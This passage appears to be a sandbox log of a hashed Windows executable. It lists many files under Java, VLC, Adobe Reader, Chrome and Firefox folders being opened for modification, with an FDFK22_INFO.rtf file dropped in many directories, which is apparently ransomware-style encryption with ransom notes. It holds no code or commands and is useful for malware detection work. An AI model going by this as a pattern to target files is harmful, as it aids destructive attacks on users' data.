a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-queries.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-5 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql70.xsl a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Regina a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Yellowknife a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\flavormap.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\San_Juan a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\La_Paz a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\license.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Casablanca a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\startNetworkServer.bat a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_partstyle.css a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbytools.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerActions.exsd a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Reunion a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding_1.4.2.v20140729-1044.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\bin\policytool.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Malta a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Taipei a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-windows_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\preface.htm a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert.ja_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\application.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\tzmappings a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3_0.12.0.v20140227-2118.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\sound.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Update\Install\{5DF2DCA9-BD54-4513-9B32-2C551D72B961}\83.0.4103.106_chrome_installer.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\about.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\St_Johns a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\file_obj.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Noumea a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-coredump_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.ds_1.4.200.v20131126-2331.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+12 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-dialogs.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Nicosia a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.expressions_3.4.600.v20140128-0851.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\jmxremote.password.template a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\orbd.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\jsse.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\newgrounds.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Oslo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\charsets.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_es.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable_1.4.1.v20140210-1835.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Kosrae a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-cli.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.commands_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\alt-rt.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jsse.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.concurrent_1.1.0.v20130327-1442.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Fortaleza a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\MANIFEST.MF a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-text.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Gibraltar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pitcairn a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Seoul a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Bahia_Banderas a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tehran a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_MoveNoDrop32x32.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Reykjavik a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+9 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Update\DisabledGoogleUpdate.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Andorra a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.util_1.0.500.v20130404-1337.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\sa-jdi.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\localedata.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mru_on_win7.css a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\ResourceInternal.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.SF a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\kn.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.security_8.1.14.v20131031.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\DigSig.api a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\jfr\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Updater.api a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\profile.jfc a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\CST6CDT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Windows Journal\Templates\blank.jtp a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kathmandu a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Tongatapu a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerActionExceptionHandlers.exsd a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Tucuman a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpcore_4.2.5.v201311072007.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\pt-PT.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4_1.0.800.v20140827-1444.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Baku a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\WET a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightDemiBold.ttf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\high-contrast.css a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Funafuti a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Bissau a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Rankin_Inlet a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\sr.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\notification_helper.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-3 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-12 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-templates.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program 